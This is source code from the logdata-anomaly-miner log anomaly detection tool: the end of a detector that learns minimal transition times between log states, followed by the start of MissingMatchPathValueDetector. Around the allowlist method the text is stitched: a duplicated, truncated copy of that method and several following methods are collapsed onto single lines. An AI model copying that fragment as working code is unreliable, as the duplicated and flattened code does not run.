        @param anomaly_threshold threshold for the confidence which must be exceeded to raise an anomaly.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether newly observed sequences should be added to the learned model.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose log atoms are skipped entirely.
        @raises ValueError if target_path_list is empty or None.
        """
        # Declared here so the attributes are not reported as "defined outside __init__"; the base class fills them in.
        for attribute in ("learn_mode", "stop_learning_time", "next_persist_time", "log_success", "log_total"):
            setattr(self, attribute, None)
        self.stop_learning_time_initialized = None
        base_kwargs = {
            "mutable_default_args": ["target_path_list", "id_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"],
            "aminer_config": aminer_config,
            "anomaly_event_handlers": anomaly_event_handlers,
            "target_path_list": target_path_list,
            "id_path_list": id_path_list,
            "ignore_list": ignore_list,
            "constraint_list": constraint_list,
            "allow_missing_id": allow_missing_id,
            "num_log_lines_solidify_matrix": num_log_lines_solidify_matrix,
            "time_output_threshold": time_output_threshold,
            "anomaly_threshold": anomaly_threshold,
            "persistence_id": persistence_id,
            "learn_mode": learn_mode,
            "output_logline": output_logline,
            "stop_learning_time": stop_learning_time,
            "stop_learning_no_anomaly_time": stop_learning_no_anomaly_time,
            "log_resource_ignore_list": log_resource_ignore_list,
        }
        super().__init__(**base_kwargs)
        if not self.target_path_list:
            msg = "target_path_list must not be empty or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

        # Learned state: time_matrix[state_1][state_2] holds the minimal observed transition time; last_value/last_time
        # remember the previous state and its time per id tuple.
        self.time_matrix = {}
        self.last_value = {}
        self.last_time = {}
        # Counts processed (non-ignored) log lines to schedule solidify_matrix.
        self.log_total = 0

        # Register with the persistence layer and restore a previously stored matrix, if any.
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()
    def receive_atom(self, log_atom):
        """Receive a log atom from a source and analyze the minimal times between state transitions.

        The state of the atom is the tuple of values under target_path_list, the sequence is selected by the tuple of values
        under id_path_list. A transition is the change from the previously seen state of that sequence to the current one.
        @param log_atom the parsed log atom; atom_time is used as the transition time.
        @return False if the atom was skipped (ignored resource, ignore_list path present, or a missing path without
                allow_missing_id), True otherwise.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        # The stop-learning deadlines are relative to the first log atom seen, so they are resolved lazily here.
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip paths from ignore list.
        if any(ignore_path in log_atom.parser_match.get_match_dictionary().keys() for ignore_path in self.ignore_list):
            return False

        # Increase the count by one and check if the matrix should be solidified.
        self.log_total += 1
        if self.log_total % self.num_log_lines_solidify_matrix == 0:
            self.solidify_matrix()

        # Use target_path_list to build the state tuple; decoded match values become dictionary keys of time_matrix.
        event_value = ()
        for path in self.target_path_list:
            match = log_atom.parser_match.get_match_dictionary().get(path)
            if match is None:
                if self.allow_missing_id is True:
                    # Insert placeholder for path that is not available
                    event_value += ("",)
                else:
                    # Omit log atom if one of the id paths is not found.
                    return False
            else:
                if isinstance(match.match_object, bytes):
                    event_value += (match.match_object.decode(AminerConfig.ENCODING),)
                else:
                    event_value += (match.match_object,)

        # Get current index from combination of values of paths of id_path_list
        id_tuple = ()
        for id_path in self.id_path_list:
            id_match = log_atom.parser_match.get_match_dictionary().get(id_path)
            if id_match is None:
                if self.allow_missing_id is True:
                    # Insert placeholder for id_path that is not available
                    id_tuple += ("",)
                else:
                    # Omit log atom if one of the id paths is not found.
                    return False
            else:
                if isinstance(id_match.match_object, bytes):
                    id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),)
                else:
                    id_tuple += (id_match.match_object,)

        # Check if id_tuple has already appeared.
        if id_tuple not in self.last_value:
            # Initialize the last value and time
            self.last_value[id_tuple] = event_value
            self.last_time[id_tuple] = log_atom.atom_time
        else:
            # Check if the event_value changed or if the times are not strictly ascending and skip the line in these cases.
            if self.last_value[id_tuple] == event_value:
                # Same state again: only the time of the sequence advances.
                self.last_time[id_tuple] = log_atom.atom_time
                return True
            if log_atom.atom_time - self.last_time[id_tuple] < 0:
                # Time went backwards for this sequence; report it with full confidence and keep last_value/last_time
                # untouched so the out-of-order line does not poison the learned minimum.
                additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)],
                                          "AffectedIdValues": list(id_tuple), "PreviousTime": self.last_time[id_tuple],
                                          "NewTime": log_atom.atom_time}
                self.print(f"Anomaly in log line order: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)}): "
                           f"{self.last_time[id_tuple]} - {log_atom.atom_time}", log_atom, self.target_path_list, confidence=1,
                           additional_information=additional_information)
                return True

            # Check in which order the event_values appear in the time matrix; a pair is stored under only one orientation.
            event_value_1 = None
            event_value_2 = None
            if event_value in self.time_matrix and self.last_value[id_tuple] in self.time_matrix[event_value]:
                event_value_1 = event_value
                event_value_2 = self.last_value[id_tuple]
            elif self.last_value[id_tuple] in self.time_matrix and event_value in self.time_matrix[self.last_value[id_tuple]]:
                event_value_1 = self.last_value[id_tuple]
                event_value_2 = event_value

            if event_value_1 is None:
                # Initialize the entry in the time matrix
                if event_value not in self.time_matrix:
                    self.time_matrix[event_value] = {}
                additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)],
                                          "AffectedIdValues": list(id_tuple),
                                          "NewMinimalTime": log_atom.atom_time - self.last_time[id_tuple]}
                message = f"First Appearance: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)})," \
                          f" {log_atom.atom_time - self.last_time[id_tuple]}"
                # A first appearance is always reported (default confidence), even outside learn_mode.
                self.print(message, log_atom, self.target_path_list, additional_information=additional_information)
                if self.learn_mode:
                    self.time_matrix[event_value][self.last_value[id_tuple]] = log_atom.atom_time - self.last_time[id_tuple]
                    if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                        self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
            else:
                # Check and update if the time was undercut
                if self.time_matrix[event_value_1][event_value_2] > log_atom.atom_time - self.last_time[id_tuple] and\
                        self.time_matrix[event_value_1][event_value_2] > self.time_output_threshold:
                    # Confidence is the relative shortfall against the known minimum; small undercuts stay below
                    # anomaly_threshold and are learned silently.
                    if 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2] >\
                            self.anomaly_threshold:
                        additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)],
                                                  "AffectedIdValues": list(id_tuple),
                                                  "PreviousMinimalTime": self.time_matrix[event_value_1][event_value_2],
                                                  "NewMinimalTime": log_atom.atom_time - self.last_time[id_tuple]}
                        message = f"Undercut transition time: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)})," \
                                  f" {self.time_matrix[event_value_1][event_value_2]} -> {log_atom.atom_time - self.last_time[id_tuple]}"
                        confidence = 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2]
                        self.print(
                            message, log_atom, self.target_path_list, confidence=confidence,
                            additional_information=additional_information)
                    if self.learn_mode:
                        # In learn_mode the undercut value replaces the minimum even when it was reported as an anomaly.
                        self.time_matrix[event_value_1][event_value_2] = log_atom.atom_time - self.last_time[id_tuple]
                        if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                            self.stop_learning_time = max(self.stop_learning_time,
                                                          log_atom.atom_time + self.stop_learning_no_anomaly_time)

            # Update the last_value and time
            self.last_value[id_tuple] = event_value
            self.last_time[id_tuple] = log_atom.atom_time
        return True
    def solidify_matrix(self):
        """Solidify the minimal time matrix with the triangle inequality.

        For every known transition a -> b and every other state v, the minimum of the two-step paths through a or b is used
        to tighten the stored time of the remaining edge; tightened edges are re-examined until nothing changes.
        Entries are created for state pairs that were never observed directly. The work per pass is proportional to
        (number of pairs) x (number of states) and membership tests on plain lists, so cost grows quickly with the number
        of distinct states.
        """
        # Initialize list old_pairs with all transitions and a list of all values
        # The list of old_pairs includes the minimal times which can be used to reduce the minimal transition times of other transitions
        values = list(self.time_matrix.keys())
        for key1 in self.time_matrix:
            values += [key for key in self.time_matrix[key1] if key not in values]
        old_pairs = [[key1, key2] for key1 in self.time_matrix for key2 in self.time_matrix[key1]]

        # Check the triangle inequality as long as values are corrected
        while len(old_pairs) > 0:
            new_pairs = []
            for old_pair in old_pairs:
                # Check triangle inequality value - old_pair[0] - old_pair[1] > value - old_pair[1] and
                # old_pair[0] - old_pair[1] - value > value - old_pair[0]
                for value in values:
                    if value in (old_pair[0], old_pair[1]):
                        continue

                    # Check value - old_pair[0] - old_pair[1] > value - old_pair[1]
                    # A pair may be stored under either orientation, so both key orders are probed.
                    if (old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]) or (
                            value in self.time_matrix and old_pair[0] in self.time_matrix[value]):
                        if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]:
                            key_1_1 = old_pair[0]
                            key_1_2 = value
                        else:
                            key_1_1 = value
                            key_1_2 = old_pair[0]
                        if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]:
                            key_2_1 = old_pair[1]
                            key_2_2 = value
                        else:
                            key_2_1 = value
                            key_2_2 = old_pair[1]
                        if key_2_1 not in self.time_matrix:
                            self.time_matrix[key_2_1] = {}
                        # Unknown or larger edge: replace it by the sum of the two known edges and queue it for the next pass.
                        if (key_2_2 not in self.time_matrix[key_2_1] or
                                self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] <
                                self.time_matrix[key_2_1][key_2_2]):
                            self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\
                                self.time_matrix[old_pair[0]][old_pair[1]]
                            if [key_2_1, key_2_2] not in new_pairs:
                                new_pairs += [[key_2_1, key_2_2]]

                    # Check old_pair[0] - old_pair[1] - value > value - old_pair[0]
                    if (old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]) or (
                            value in self.time_matrix and old_pair[1] in self.time_matrix[value]):
                        if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]:
                            key_1_1 = old_pair[1]
                            key_1_2 = value
                        else:
                            key_1_1 = value
                            key_1_2 = old_pair[1]
                        if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]:
                            key_2_1 = old_pair[0]
                            key_2_2 = value
                        else:
                            key_2_1 = value
                            key_2_2 = old_pair[0]
                        if key_2_1 not in self.time_matrix:
                            self.time_matrix[key_2_1] = {}
                        if (key_2_2 not in self.time_matrix[key_2_1] or
                                self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] <
                                self.time_matrix[key_2_1][key_2_2]):
                            self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\
                                self.time_matrix[old_pair[0]][old_pair[1]]
                            if [key_2_1, key_2_2] not in new_pairs:
                                new_pairs += [[key_2_1, key_2_2]]
            old_pairs = new_pairs
    def do_timer(self, trigger_time):
        """Persist the time matrix once the persistence period has elapsed.

        @param trigger_time the current trigger time.
        @return the delay until the next call: the time left until next_persist_time, or the configured persistence period
                (KEY_PERSISTENCE_PERIOD, falling back to DEFAULT_PERSISTENCE_PERIOD) after persisting or while no
                next_persist_time is set yet.
        """
        persistence_period = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        if self.next_persist_time is None:
            return persistence_period
        remaining = self.next_persist_time - trigger_time
        if remaining > 0:
            return remaining
        self.do_persist()
        self.next_persist_time = trigger_time + persistence_period
        return persistence_period

    def do_persist(self):
        """Immediately write persistence data to storage.

        The matrix is stored as [rows, outer_keys, inner_key_lists]: rows[i][j] is the minimal time from outer_keys[i] to
        inner_key_lists[i][j]; tuple keys become JSON lists and are converted back by load_persistence_data.
        """
        outer_keys = list(self.time_matrix.keys())
        inner_key_lists = [list(self.time_matrix[key].keys()) for key in outer_keys]
        # dict.values() iterates in the same order as dict.keys(), so rows line up with inner_key_lists.
        rows = [list(self.time_matrix[key].values()) for key in outer_keys]
        persist_data = [rows, outer_keys, inner_key_lists]
        PersistenceUtil.store_json(self.persistence_file_name, persist_data)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage and rebuild time_matrix from the layout written by do_persist.

        Nothing is changed when no persistence file exists. The matrix is only assigned after the whole file was converted,
        so a malformed file raises before any partial state is installed.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is None:
            return
        rows = persistence_data[0]
        outer_keys = [tuple(key) for key in persistence_data[1]]
        inner_key_lists = [[tuple(key) for key in persistence_data[2][i]] for i in range(len(persistence_data[2]))]
        rebuilt = {}
        for i in range(len(outer_keys)):
            row = {}
            for j in range(len(inner_key_lists[i])):
                row[inner_key_lists[i][j]] = rows[i][j]
            rebuilt[outer_keys[i]] = row
        self.time_matrix = rebuilt

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        The event_data is appended to constraint_list as given; no shape check is performed on it here.
        @param event_type must equal "Analysis.<class name>" of this detector.
        @param event_data the path to allowlist.
        @param allowlisting_data must be None; this detector does not interpret additional allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        def reject(msg):
            """Log the reason and raise it as an exception."""
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        if event_type != f"Analysis.{self.__class__.__name__}":
            reject("Event not from this source")
        if allowlisting_data is not None:
            reject("Allowlisting data not understood by this detector")
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f"Allowlisted path {event_data} in {event_type}."
event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def print_persistence_event(self, event_type, event_data): """Prints the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 2 and ( (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])) or ( len(event_data) == 1 and isinstance(event_data[0], list) and len(event_data[0]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format." 
\ "The supported formats are [], [path_value_list] and [path_value_list_1, path_value_list_2], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.time_matrix.keys()) for value in list(values_set): for value_2 in self.time_matrix[value]: values_set.add(value_2) values_list = list(values_set) values_list.sort() string = f"Persistence includes transition times to the following path values: {values_list}" elif len(event_data) == 1: # Print the set of all path values which have a transition time to the path value specified in event_data # Check if the path value has an entry in self.time_matrix if event_data[0] in self.time_matrix: values_set = set(self.time_matrix[event_data[0]].keys()) else: values_set = set() # Check if key values in self.time_matrix contain the path value of event_data for value in list(self.time_matrix.keys()): if event_data[0] in self.time_matrix[value]: values_set.add(value) values_list = list(values_set) values_list.sort() # Set output string if len(values_set) > 0: string = f"Persistence includes transition times from {event_data[0]} to the following path values: {values_list}" else: string = f"Persistence includes no transition time from {event_data[0]}." 
else: # Print the transition time # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Set output string if event_value_1 is None: string = f"No transition time for {list(event_data[0])} - {list(event_data[1])}." else: string = f"Transition time {list(event_data[0])} - {list(event_data[1])}: {self.time_matrix[event_value_1][event_value_2]}." return string def add_to_persistence_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (isinstance(event_data, list) and len(event_data) == 3 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1]) and isinstance(event_data[2], (int, float))): msg = "Event_data has the wrong format." \ "The supported format is [path_value_list_1, path_value_list_2, new_transition_time], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] if event_value_1 is None: # Initialize the entry in the time matrix if event_data[0] not in self.time_matrix: self.time_matrix[event_data[0]] = {} self.time_matrix[event_data[0]][event_data[1]] = float(event_data[2]) return f"Added transition time: {list(event_data[0])} - {list(event_data[1])}, {float(event_data[2])}" old_transition_time = self.time_matrix[event_value_1][event_value_2] self.time_matrix[event_value_1][event_value_2] = float(event_data[2]) return f"Changed transition time {list(event_data[0])} - {list(event_data[1])} from {old_transition_time} to {float(event_data[2])}" def remove_from_persistence_event(self, event_type, event_data): """Removes the information of event_data from the persistence of component_name. @return a message with information about the removal from the persistence. @throws Exception when the addition of this special event using given event_data was not possible. 
""" if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])): msg = "Event_data has the wrong format. " \ "The supported format is [path_value_list_1, path_value_list_2], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Check if the transition time between the path values exists if event_value_1 is None: string = f"Transition time for {list(event_data[0])} - {list(event_data[1])} does not exist and therefore could not be deleted." else: # Delete the transition time deleted_time = self.time_matrix[event_value_1].pop(event_value_2) # Delete the entry to event_value_1 if it is empty if self.time_matrix[event_value_1] == {}: self.time_matrix.pop(event_value_1) string = f"Deleted transition time {list(event_data[0])} - {list(event_data[1])}: {deleted_time}." 
return string def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def print(self, message, log_atom, affected_path, confidence=None, additional_information=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if additional_information is None: additional_information = {} original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: sorted_log_lines = [original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} for key, value in additional_information.items(): analysis_component[key] = value event_data = {"AnalysisComponent": analysis_component, "TypeInfo": {}} if confidence is not None: event_data["TypeInfo"]["Confidence"] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) 
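MissingMatchPathValueDetector.py000066400000000000000000000525301500476301700372200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module provides the MissingMatchPathValueDetector to generate events when expected values were not seen for an extended
period of time.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""

import logging

from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \
    STAT_LOG_NAME
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class MissingMatchPathValueDetector(
        AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """This class creates events when an expected value is not seen within a given timespan.

    For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function
    provided by NewMatchPathValueDetector.
    For each unique value extracted by paths, a tracking record is added to expected_values_dict. It stores four entries: the
    timestamp the extracted value was last seen, the maximum allowed gap between observations, the next alerting time when
    currently in error state (zero when in normal, alerting state) and the target path the value was extracted from.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", learn_mode=False,
                 default_interval=3600, realert_interval=86400, combine_values=True, output_logline=True, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether new expected values should be learned.
        @param default_interval time in seconds before a value is reported missing. The parameter is applied to the parsed record
               data time, not the system time. Hence, reports can be delayed when no data is received.
        @param realert_interval time in seconds before a value is reported missing for a second time. The parameter is applied to
               the parsed record data time, not the system time. Hence, reports can be delayed when no data is received.
        @param combine_values if true the combined values are identifiers. When false, individual values are checked.
        @param output_logline forwarded to the base class initializer.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list forwarded to the base class initializer; atoms whose source resource name is listed are
               skipped by receive_atom().
        @raise ValueError when target_path_list is None or empty.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, learn_mode=learn_mode, default_interval=default_interval, realert_interval=realert_interval,
            output_logline=output_logline, combine_values=combine_values, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list,
            mutable_default_args=["log_resource_ignore_list"]
        )
        # This timestamp is compared with timestamp values from log atoms for activation of alerting logic. The first timestamp from
        # logs above this value will trigger alerting.
        self.next_check_timestamp = 0
        self.last_seen_timestamp = 0
        self.log_learned_values = 0
        self.log_new_learned_values = []
        if not self.target_path_list:
            msg = "target_path_list must not be None or empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        self.expected_values_dict = {}
        self.load_persistence_data()
        self.analysis_string = "Analysis.%s"

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.
        @param log_atom binary raw atom data
        @return True if this handler was really able to handle and process the atom. Depending on this information, the caller
        may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented
        at each source implementation sending log atoms.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        self.log_total += 1
        # Stop-learning deadlines are relative to the first atom's time, so they are resolved lazily here.
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        value = self.get_channel_key(log_atom)
        if value is None or (not value[0] and not value[1]):
            return False
        target_paths, value_list = value
        # get_channel_key() returns plain strings when combine_values is set (or in the list subclass); normalize to lists.
        if isinstance(target_paths, str) and isinstance(value_list, str):
            target_paths = [target_paths]
            value_list = [value_list]
        timestamp = log_atom.get_timestamp()
        for i, target_path in enumerate(target_paths):
            value = value_list[i]
            detector_info = self.expected_values_dict.get(value)
            if detector_info is None and self.learn_mode:
                # Record layout: [last seen timestamp, allowed gap, next alerting time (0 = normal state), target path].
                self.expected_values_dict[value] = [timestamp, self.default_interval, 0, target_path]
                self.next_check_timestamp = min(self.next_check_timestamp, timestamp + self.default_interval)
                self.log_learned_values += 1
                self.log_new_learned_values.append(value)
                if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
        self.check_timeouts(timestamp, log_atom)
        for i, target_path in enumerate(target_paths):
            value = value_list[i]
            detector_info = self.expected_values_dict.get(value)
            if detector_info is not None:
                # Just update the last seen value and switch from non-reporting error state to normal state.
                detector_info[0] = timestamp
                if detector_info[2] != 0:
                    if timestamp >= detector_info[2]:
                        detector_info[2] = 0
                # Delta of this detector might be lower than the default maximum recheck time.
                self.next_check_timestamp = min(self.next_check_timestamp, timestamp + detector_info[1])
        self.log_success += 1
        return True

    def get_channel_key(self, log_atom):
        """Get the key identifying the channel this log_atom is coming from.
        @return a (path_list, value_list) pair, or None when combine_values is set and one target path is missing from the match.
        When combine_values is set both elements are the str() of the respective list, otherwise they are lists.
        """
        value_list = []
        path_list = []
        for target_path in self.target_path_list:
            match = log_atom.parser_match.get_match_dictionary().get(target_path)
            if match is None:
                if self.combine_values:
                    return None
                continue
            matches = []
            if isinstance(match, list):
                matches = match
            else:
                matches.append(match)
            for match in matches:
                if isinstance(match.match_object, bytes):
                    affected_log_atom_values = match.match_object.decode(AminerConfig.ENCODING)
                else:
                    affected_log_atom_values = match.match_object
                value_list.append(str(affected_log_atom_values))
                path_list.append(target_path)
        if self.combine_values:
            value_list = str(value_list)
            path_list = str(path_list)
        return path_list, value_list

    def check_timeouts(self, timestamp, log_atom):
        """Check if there was any timeout on a channel, thus triggering event dispatching.
        @param timestamp the timestamp of the current log atom; last_seen_timestamp is advanced to it when larger.
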